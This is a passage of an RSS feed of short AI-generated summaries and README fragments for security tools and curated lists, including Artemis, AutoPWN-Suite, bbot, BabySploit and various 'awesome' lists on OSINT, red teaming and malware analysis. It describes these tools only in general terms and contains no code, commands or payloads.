&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; APT_REPORT is a comprehensive collection of threat intelligence, samples, and reports on advanced persistent threat (APT) groups, particularly those linked to specific countries. It focuses on detailed analyses of various APT campaigns, enabling users to understand tactics and recent developments in cyber threat landscapes. Notable features include references to extensive case studies and operational details of prominent threat actor groups, enhancing situational awareness for cybersecurity professionals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="apt_report-collected-by-blackorbird"&gt;APT_REPORT collected by @blackorbird &lt;a href="https://x.com/blackorbird"&gt;https://x.com/blackorbird&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;Interesting apt report &amp;amp; sample &amp;amp; malware &amp;amp; technology &amp;amp; intellegence collection&lt;/p&gt;</description></item><item><title>APTRS</title><link>https://rainmana.github.io/hackyfeed/tools/aptrs-aptrs/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aptrs-aptrs/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; APTRS (Automated Penetration Testing Reporting System) is a Python and Django-based tool that automates the generation of penetration testing reports in PDF and Excel formats, enhancing efficiency for security professionals. Its primary use case is to facilitate organized and streamlined reporting while allowing users to manage and monitor vulnerabilities across various projects. Notable features include support for multiple platforms, a user-friendly web interface, and integration with various CI/CD workflows for continuous testing.&lt;/p&gt;</description></item><item><title>Artemis</title><link>https://rainmana.github.io/hackyfeed/tools/cert-polska-artemis/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cert-polska-artemis/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Artemis is a modular vulnerability scanner designed for assessing website security, primarily used by CERT PL for scanning activities. Its notable features include the ability to automatically generate user-friendly reports detailing specific vulnerabilities, such as exposed version control system data and outdated software versions, which aids organizations in mitigating security risks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1&gt;
 &lt;picture&gt;
 &lt;source media="(prefers-color-scheme: dark)" srcset="static/images/logo_dark.png"&gt;
 &lt;img alt="logo" width="400px" src="static/images/logo.png"&gt;
 &lt;/picture&gt;
&lt;/h1&gt;
&lt;p&gt;Artemis is a modular vulnerability scanner. It&amp;rsquo;s the tool that powers CERT PL scanning activities by
&lt;a href="https://artemis-scanner.readthedocs.io/en/latest/features.html"&gt;checking various aspects of website security&lt;/a&gt;
and &lt;a href="https://artemis-scanner.readthedocs.io/en/latest/generating-reports.html"&gt;building easy-to-read messages ready to be sent to the scanned organizations&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>AsmResolver</title><link>https://rainmana.github.io/hackyfeed/tools/washi1337-asmresolver/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/washi1337-asmresolver/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AsmResolver is a library designed for reading, modifying, and reconstructing Portable Executable (PE) files, with support for both unmanaged and managed (.NET) binaries. Its primary use case includes comprehensive manipulation of PE file structures, such as modifying sections and metadata, reconstructing Import Address Tables, and providing easy access to .NET metadata through a user-friendly API. Notable features include cross-platform compatibility, robust handling of obfuscated binaries, and support for a wide range of resource types and debugging symbols, all while being fully documented and unit tested.&lt;/p&gt;</description></item><item><title>AttackSurfaceAnalyzer</title><link>https://rainmana.github.io/hackyfeed/tools/microsoft-attacksurfaceanalyzer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/microsoft-attacksurfaceanalyzer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Attack Surface Analyzer is an open-source security tool developed by Microsoft that evaluates the attack surface of a system by identifying security vulnerabilities arising from software installations or misconfigurations. Its core functionality includes the ability to compare and analyze system configurations before and after software is installed, monitoring multiple operating system components such as the file system, user accounts, and firewall settings. Version 2.3 introduces a Blazor GUI for rule authoring, enhanced performance, and support for .NET 6, along with various collectors for in-depth analysis.&lt;/p&gt;</description></item><item><title>AutoPentestX</title><link>https://rainmana.github.io/hackyfeed/tools/gowtham-darkseid-autopentestx/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gowtham-darkseid-autopentestx/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AutoPentestX is an automated penetration testing toolkit designed for streamlined security assessments. Its primary use case is to facilitate vulnerability scanning and testing in Linux environments, offering features that simplify the process of identifying and exploiting security weaknesses. The toolkit supports Python 3.8 and above, underscoring its compatibility with modern scripting standards and enhancing its applicability in cybersecurity workflows.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="autopentestx---automated-penetration-testing-toolkit"&gt;AutoPentestX - Automated Penetration Testing Toolkit&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://opensource.org/licenses/MIT"&gt;&lt;img src="https://img.shields.io/badge/License-MIT-yellow.svg" alt="License: MIT"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/"&gt;&lt;img src="https://img.shields.io/badge/python-3.8+-blue.svg" alt="Python 3.8+"&gt;&lt;/a&gt;
&lt;a href="https://www.linux.org/"&gt;&lt;img src="https://img.shields.io/badge/platform-Linux-lightgrey.svg" alt="Platform"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>AutoPWN-Suite</title><link>https://rainmana.github.io/hackyfeed/tools/gamehunterkaan-autopwn-suite/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gamehunterkaan-autopwn-suite/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AutoPWN Suite is a comprehensive tool designed for automatic vulnerability scanning and exploitation of systems, leveraging advanced scanning techniques such as nmap TCP-SYN scans to identify software versions and associated vulnerabilities. Key features include automatic vulnerability detection, web application testing for various exploits (LFI, XSS, SQLI), configurable scanning options, noise and evasion modes, along with easy result sharing via webhooks or email, and compatibility across multiple operating systems.&lt;/p&gt;</description></item><item><title>Awesome-Android-Reverse-Engineering</title><link>https://rainmana.github.io/hackyfeed/tools/user1342-awesome-android-reverse-engineering/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/user1342-awesome-android-reverse-engineering/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Android Reverse Engineering is a comprehensive repository that curates a wide range of resources, training, and tools specifically designed for reverse engineering Android applications and systems. It includes categories for static and dynamic analysis tools, decompilers, malware analysis, and extensive training materials such as courses, videos, and books. Notably, it provides a user-friendly navigation system with search functionality and highlights significant resources to facilitate efficient learning and research in Android security.&lt;/p&gt;</description></item><item><title>awesome-aws-security</title><link>https://rainmana.github.io/hackyfeed/tools/jassics-awesome-aws-security/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jassics-awesome-aws-security/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome AWS Security is a curated repository that aggregates a wide range of resources related to AWS security practices, including whitepapers, books, videos, tutorials, and security tools. It serves as a comprehensive educational tool for professionals and enthusiasts seeking to enhance their knowledge of AWS security, featuring a well-structured table of contents and links to valuable references and training materials. Notable features include categorized resources for various learning preferences, from free content to paid courses, as well as a focus on contemporary security issues and best practices.&lt;/p&gt;</description></item><item><title>Awesome-Blackhat-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/ucybers-awesome-blackhat-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ucybers-awesome-blackhat-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Black Hat Tools is a curated repository of cybersecurity tools showcased at Black Hat events globally, serving as a practical reference for professionals in offensive, defensive, and research-driven cybersecurity. The tools are systematically organized by event location, year, and category, including Red Teaming, OSINT, and more, ensuring easy accessibility for users seeking field-tested solutions. This repository encourages community contributions to continually enhance the collection, making it a dynamic resource for current cybersecurity methodologies.&lt;/p&gt;</description></item><item><title>awesome-bugbounty-tools</title><link>https://rainmana.github.io/hackyfeed/tools/vavkamil-awesome-bugbounty-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vavkamil-awesome-bugbounty-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Bug Bounty Tools is a comprehensive, curated repository of various tools utilized in the bug bounty hunting and penetration testing process. It encompasses a wide range of categories including reconnaissance, exploitation, and miscellaneous utilities, featuring tools for tasks such as subdomain enumeration, various injection techniques, and vulnerability scanning. With an extensive selection of resources, this repository aims to streamline the bug hunting workflow for security professionals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="awesome-bug-bounty-tools-awesome"&gt;Awesome Bug Bounty Tools &lt;a href="https://awesome.re"&gt;&lt;img src="https://awesome.re/badge.svg" alt="Awesome"&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;blockquote&gt;
&lt;p&gt;A curated list of various bug bounty tools&lt;/p&gt;</description></item><item><title>Awesome-Cybersecurity-Handbooks</title><link>https://rainmana.github.io/hackyfeed/tools/0xsyr0-awesome-cybersecurity-handbooks/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xsyr0-awesome-cybersecurity-handbooks/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Awesome Cybersecurity Handbooks&amp;rdquo; repository is a comprehensive collection of resources and personal notes aimed at aiding individuals in the fields of red teaming and Capture The Flag (CTF) challenges. This tool features a variety of topics including information gathering, vulnerability analysis, web application assessment, and post-exploitation strategies, serving as an extensive guide for cybersecurity professionals to enhance their knowledge and skills for legal purposes. Notable aspects include frequent updates and a commitment to legal and ethical use of the provided materials.&lt;/p&gt;</description></item><item><title>awesome-executable-packing</title><link>https://rainmana.github.io/hackyfeed/tools/packing-box-awesome-executable-packing/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/packing-box-awesome-executable-packing/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Executable Packing is a comprehensive resource catalog focused on the techniques and tools related to the packing of executable files, including various formats like Portable Executable and Executable and Linkable Format. The repository collects literature, datasets, packing tools, and detection methodologies, emphasizing the key functions of packing such as compression, encryption, and obfuscation to protect and modify executables. Notable features include curated references to scholarly articles, documentation, and a classification of packers by historical context.&lt;/p&gt;</description></item><item><title>awesome-hacker-search-engines</title><link>https://rainmana.github.io/hackyfeed/tools/edoardottt-awesome-hacker-search-engines/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/edoardottt-awesome-hacker-search-engines/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Hacker Search Engines is a curated repository of search engines specifically designed for penetration testing, vulnerability assessments, and red/blue team operations. It categorizes various resources including general search engines, servers, vulnerabilities, exploits, and more, providing tools for effective reconnaissance and threat intelligence gathering. Notable features include links to specialized engines like Shodan and the NIST NVD, enabling streamlined access to critical information for security professionals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;b&gt;Awesome Hacker Search Engines&lt;/b&gt; &lt;img src="https://raw.githubusercontent.com/edoardottt/images/main/awesome-hacker-search-engines/awesome.svg"/&gt;
&lt;/h1&gt;
&lt;p align="center"&gt;
A curated list of awesome search engines useful during Penetration testing, Vulnerability assessments, Red/Blue Team operations, Bug Bounty and more
&lt;/p&gt;</description></item><item><title>awesome-hacking</title><link>https://rainmana.github.io/hackyfeed/tools/jekil-awesome-hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jekil-awesome-hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome hacking is an awesome collection of hacking tools.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Awesome hacking is an awesome collection of hacking tools.&lt;/p&gt;</description></item><item><title>awesome-hacking-lists</title><link>https://rainmana.github.io/hackyfeed/tools/taielab-awesome-hacking-lists/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/taielab-awesome-hacking-lists/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;awesome-hacking-lists&amp;rdquo; repository is a curated collection of GitHub stars organized by programming languages and tools relevant to cybersecurity and hacking. Its primary use case is to provide a comprehensive reference for security professionals and enthusiasts looking for resources, projects, and exploits in various programming environments. Notable features include structured content for easy navigation and a wide array of topics spanning multiple technology stacks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;!--lint disable awesome-contributing awesome-license awesome-list-item match-punctuation no-repeat-punctuation no-undefined-references awesome-spell-check--&gt;
&lt;h1 id="awesome-stars-awesome"&gt;Awesome Stars &lt;a href="https://github.com/sindresorhus/awesome"&gt;&lt;img src="https://awesome.re/badge.svg" alt="Awesome"&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;blockquote&gt;
&lt;p&gt;A curated list of my GitHub stars! Generated by &lt;a href="https://github.com/maguowei/starred"&gt;starred&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>Awesome-Hacking-Resources</title><link>https://rainmana.github.io/hackyfeed/tools/vitalysim-awesome-hacking-resources/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vitalysim-awesome-hacking-resources/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Hacking Resources is a comprehensive collection of materials designed for individuals looking to enhance their skills in hacking and penetration testing. The repository includes various categories such as learning resources, online courses, forums, and tools crucial for topics like malware analysis and network scanning, promoting community contribution and knowledge sharing within the cybersecurity field. Notably, it features a dedicated list of tools and links to educational content, making it a valuable resource for both beginners and advanced practitioners.&lt;/p&gt;</description></item><item><title>awesome-malware-analysis</title><link>https://rainmana.github.io/hackyfeed/tools/rshipp-awesome-malware-analysis/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rshipp-awesome-malware-analysis/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Awesome Malware Analysis repository provides a comprehensive curated list of malware analysis tools and resources, aimed at enhancing research and understanding of malware threats. Notable features include sections on various categories such as malware collections, open-source threat intelligence, detection and classification methodologies, and online scanners, facilitating a structured approach for analysts. This resource serves as a valuable reference for cybersecurity professionals seeking effective tools for malware research and investigation.&lt;/p&gt;</description></item><item><title>awesome-oscp</title><link>https://rainmana.github.io/hackyfeed/tools/0x4d31-awesome-oscp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0x4d31-awesome-oscp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Awesome OSCP repository is a curated collection of resources aimed at individuals preparing for the Offensive Security Certified Professional (OSCP) certification. It includes a variety of materials such as reviews, guides, cheatsheets, and specialized scripts covering key topics like buffer overflows and privilege escalation, facilitating a structured and comprehensive study approach for aspiring penetration testers. Notable features include extensive links to preparation guides, practical hacking tips, and tools specifically designed to aid in the OSCP exam.&lt;/p&gt;</description></item><item><title>awesome-osint</title><link>https://rainmana.github.io/hackyfeed/tools/jivoi-awesome-osint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jivoi-awesome-osint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome OSINT is a curated repository of open-source intelligence tools and resources designed for individuals involved in Cyber Threat Intelligence (CTI) and threat hunting. The repository offers a comprehensive list of utilities across various categories, including search engines, social media tools, and data analysis resources, catering to users from beginner to advanced levels. Notable features include specialized searches for academic resources, geospatial mapping, threat actor insights, and dark web exploration, enabling proactive intelligence gathering from publicly available sources.&lt;/p&gt;</description></item><item><title>Awesome-OSINT-For-Everything</title><link>https://rainmana.github.io/hackyfeed/tools/astrosp-awesome-osint-for-everything/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/astrosp-awesome-osint-for-everything/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome OSINT For Everything is a comprehensive repository of OSINT tools and websites aimed at penetration testing, red teaming, information gathering, and bug bounty initiatives. It organizes a wide array of resources categorized by specific use cases such as recon, threat intelligence, social media analysis, and more, making it a valuable tool for cybersecurity professionals seeking to enhance their investigative capabilities. Notable features include a detailed index of tools across various domains, including geo-location, cryptocurrency, and privacy/security resources, providing users with extensive options for OSINT-related tasks.&lt;/p&gt;</description></item><item><title>awesome-privilege-escalation</title><link>https://rainmana.github.io/hackyfeed/tools/m0nad-awesome-privilege-escalation/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m0nad-awesome-privilege-escalation/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome Privilege Escalation is a comprehensive resource that curates techniques, tools, and methodologies for privilege escalation across multiple platforms, including Linux, Windows, Docker, and cloud environments. It features a structured table of contents with links to guides, techniques, and relevant presentations, allowing security professionals to efficiently explore various escalation vectors and strategies. Notable sections include targeted discussions on specific operating system techniques and curated tools for CVE identification and exploitation.&lt;/p&gt;</description></item><item><title>awesome-rat</title><link>https://rainmana.github.io/hackyfeed/tools/alphaseclab-awesome-rat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alphaseclab-awesome-rat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;lsquo;awesome-rat&amp;rsquo; repository serves as a comprehensive catalog of over 250 open-source Remote Access Tools (RATs) and associate Command &amp;amp; Control (C&amp;amp;C) frameworks, along with 1200+ analytical reports and articles related to RATs. It provides a structured directory that categorizes both open-source and commercial tools, as well as notable examples of malicious software, making it a valuable resource for cybersecurity professionals seeking to understand and analyze RATs and their implications. Key features include a detailed listing of tools, extensive documentation, and links to related research articles.&lt;/p&gt;</description></item><item><title>Awesome-RedTeam-Cheatsheet</title><link>https://rainmana.github.io/hackyfeed/tools/ristbs-awesome-redteam-cheatsheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ristbs-awesome-redteam-cheatsheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Awesome Red Team Cheatsheet is a comprehensive reference tool designed for red team practitioners, providing techniques and methodologies for various stages of the attack lifecycle, including initial access, privilege escalation, lateral movement, and evasion strategies. It offers detailed sections on specific tactics like credential dumping, active directory exploitation, and OSINT, along with supporting guides on Windows protocols and operational security (OPSEC). Notable features include links to targeted exploitation techniques and enumeration strategies, aiding cybersecurity professionals in simulating attacks and improving defensive measures.&lt;/p&gt;</description></item><item><title>awesome-social-engineering</title><link>https://rainmana.github.io/hackyfeed/tools/giuliacassara-awesome-social-engineering/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/giuliacassara-awesome-social-engineering/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Awesome Social Engineering repository offers a curated collection of resources and tools specifically designed for cybersecurity professionals, penetration testers, and educational purposes within controlled environments. It features a diverse range of materials, including online courses, literature on psychology relevant to social engineering, and tools for practical application, making it a comprehensive guide for those interested in the field. Notably, it emphasizes ethical use and provides an engaging platform for learning and skill enhancement in social engineering techniques.&lt;/p&gt;</description></item><item><title>Awesome-Telegram-OSINT</title><link>https://rainmana.github.io/hackyfeed/tools/itismecall911-awesome-telegram-osint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/itismecall911-awesome-telegram-osint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome-Telegram-OSINT is a comprehensive repository designed for Open Source Intelligence (OSINT) related to Telegram. Its primary use case is to facilitate the search and discovery of Telegram channels, groups, and tools through a curated list of search engines and directories. Notable features include a wide array of resources for searching Telegram content, including specialized databases, search engines, and community-driven catalogs, making it a valuable tool for researchers and analysts in the OSINT community.&lt;/p&gt;</description></item><item><title>awesome-termux-hacking</title><link>https://rainmana.github.io/hackyfeed/tools/may215-awesome-termux-hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/may215-awesome-termux-hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;awesome-termux-hacking&amp;rdquo; repository aggregates a collection of tools designed for penetration testing and security assessments on Android devices using the Termux environment. Key tools include ANDRAX, a robust penetration testing platform that functions natively on Android, and ReconCobra, an automated pentest framework for information gathering. This repository enhances the capabilities of ethical hacking on mobile platforms by offering various utilities for tasks such as subdomain enumeration, exploit searching, and proxy management.&lt;/p&gt;</description></item><item><title>awesome-web-hacking</title><link>https://rainmana.github.io/hackyfeed/tools/infoslack-awesome-web-hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/infoslack-awesome-web-hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;awesome-web-hacking&amp;rdquo; repository serves as a comprehensive resource for individuals seeking to enhance their knowledge of web application security. It includes categorized lists of books, documentation, tools, cheat sheets, and educational courses, making it a valuable starting point for learning about penetration testing and various security vulnerabilities. Notable features include contributions from the community through pull requests and a diverse array of resources for both beginners and experienced security professionals.&lt;/p&gt;</description></item><item><title>awesome-yara</title><link>https://rainmana.github.io/hackyfeed/tools/inquest-awesome-yara/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/inquest-awesome-yara/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Awesome YARA is a curated repository that aggregates a comprehensive collection of YARA rules, tools, and resources aimed at enhancing malware detection and analysis. It serves as a valuable resource for cybersecurity professionals and researchers, featuring contributions from various practitioners, performance guidelines, and annual challenges to foster community engagement in YARA rule creation. Notable features include a wide array of rule collections from established cybersecurity entities and active maintenance status indicators for repositories of interest.&lt;/p&gt;</description></item><item><title>BabySploit</title><link>https://rainmana.github.io/hackyfeed/tools/m4cs-babysploit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m4cs-babysploit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BabySploit is a user-friendly penetration testing toolkit designed to assist users in learning more complex frameworks like Metasploit. It features an intuitive interface and a suite of tools for exploiting vulnerabilities, making it accessible for users of all experience levels, while being optimized for Kali Linux and also tested for macOS compatibility. Notable functionality includes an integrated configuration management system and support for various essential exploitation tools.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;a href="https://pepy.tech/project/babysploit"&gt;&lt;img src="https://pepy.tech/badge/babysploit/week"&gt;&lt;/a&gt;
 &lt;a href="https://pepy.tech/project/babysploit"&gt;&lt;img src="https://pepy.tech/badge/babysploit/month"&gt;&lt;/a&gt;
 &lt;a href="https://pepy.tech/project/babysploit"&gt;&lt;img src="https://pepy.tech/badge/babysploit"&gt;&lt;/a&gt;&lt;/br&gt;
 &lt;a href="https://github.com/M4cs/BabySploit/network"&gt;&lt;img src="https://img.shields.io/github/forks/M4cs/BabySploit.svg" alt="Forks"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/M4cs/BabySploit/stargazers"&gt;&lt;img src="https://img.shields.io/github/stars/M4cs/BabySploit.svg" atl="Stars"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/M4cs/BabySploit/issues"&gt;&lt;img src="https://img.shields.io/github/issues/M4cs/BabySploit.svg" alt="Issues"&gt;&lt;/a&gt;
 &lt;a href=""&gt;&lt;img src="https://img.shields.io/badge/version-1.5-green.svg?syle=popout"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/M4cs/BabySploit/blob/master/LICENSE.md"&gt;&lt;img src="https://img.shields.io/github/license/M4cs/BabySploit.svg" alt="License"&gt;&lt;/a&gt;
 &lt;a href="http://www.python.org/download/"&gt;&lt;img alt="Python 3.6+" src="https://img.shields.io/badge/Python-3.6+-yellow.svg"&gt;&lt;/a&gt;
 &lt;a href="https://twitter.com/intent/tweet?text=Wow:&amp;url=https%3A%2F%2Fgithub.com%2FM4cs%2FBabySploit"&gt;&lt;img src="https://img.shields.io/twitter/url/https/github.com/M4cs/BabySploit.svg?style=popout" alt="Twitter"&gt;&lt;/a&gt;
 &lt;a href="https://discord.gg/C7jgQeN"&gt;&lt;img src="https://img.shields.io/badge/discord-join-blue.svg?syle=popout"&gt;&lt;/a&gt;
&lt;p align="center"&gt;
 &lt;b&gt;Made For Kali Linux. No Support For Other Distros If There Are Problems. Tested and Working on MacOS for most Tools.&lt;/b&gt;
 &lt;/br&gt;&lt;a href="https://twitter.com/maxbridgland" alt="Twitter Link"&gt;&lt;b&gt;Developed by @maxbridgland&lt;/b&gt;&lt;/a&gt;&lt;/br&gt;
 &lt;a href="https://bit.ly/2Ke9uVi"&gt;Donate&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>bbot</title><link>https://rainmana.github.io/hackyfeed/tools/blacklanternsecurity-bbot/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/blacklanternsecurity-bbot/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BBOT is a versatile reconnaissance tool designed primarily for automating tasks related to bug bounties and attack surface management (ASM). Notable features include comprehensive subdomain enumeration, web crawling to extract sensitive information, and an efficient integration of multiple APIs to enhance data gathering effectiveness. The tool also boasts a real-time visualization capability, allowing users to intuitively analyze results.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/blacklanternsecurity/bbot"&gt;&lt;img src="https://github.com/user-attachments/assets/f02804ce-9478-4f1e-ac4d-9cf5620a3214" alt="bbot_banner"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.python.org"&gt;&lt;img src="https://img.shields.io/badge/python-3.9+-FF8400" alt="Python Version"&gt;&lt;/a&gt; &lt;a href="https://github.com/blacklanternsecurity/bbot/blob/dev/LICENSE"&gt;&lt;img src="https://img.shields.io/badge/license-AGPLv3-FF8400.svg" alt="License"&gt;&lt;/a&gt; &lt;a href="https://www.reconvillage.org/talks"&gt;&lt;img src="https://img.shields.io/badge/DEF%20CON%20Demo%20Labs-2023-FF8400.svg" alt="DEF CON Recon Village 2024"&gt;&lt;/a&gt; &lt;a href="https://pepy.tech/project/bbot"&gt;&lt;img src="https://static.pepy.tech/personalized-badge/bbot?right_color=orange&amp;amp;left_color=grey" alt="PyPi Downloads"&gt;&lt;/a&gt; &lt;a href="https://github.com/astral-sh/ruff"&gt;&lt;img src="https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json" alt="Ruff"&gt;&lt;/a&gt; &lt;a href="https://github.com/blacklanternsecurity/bbot/actions?query=workflow%3A%22tests%22"&gt;&lt;img src="https://github.com/blacklanternsecurity/bbot/actions/workflows/tests.yml/badge.svg?branch=stable" alt="Tests"&gt;&lt;/a&gt; &lt;a href="https://codecov.io/gh/blacklanternsecurity/bbot"&gt;&lt;img 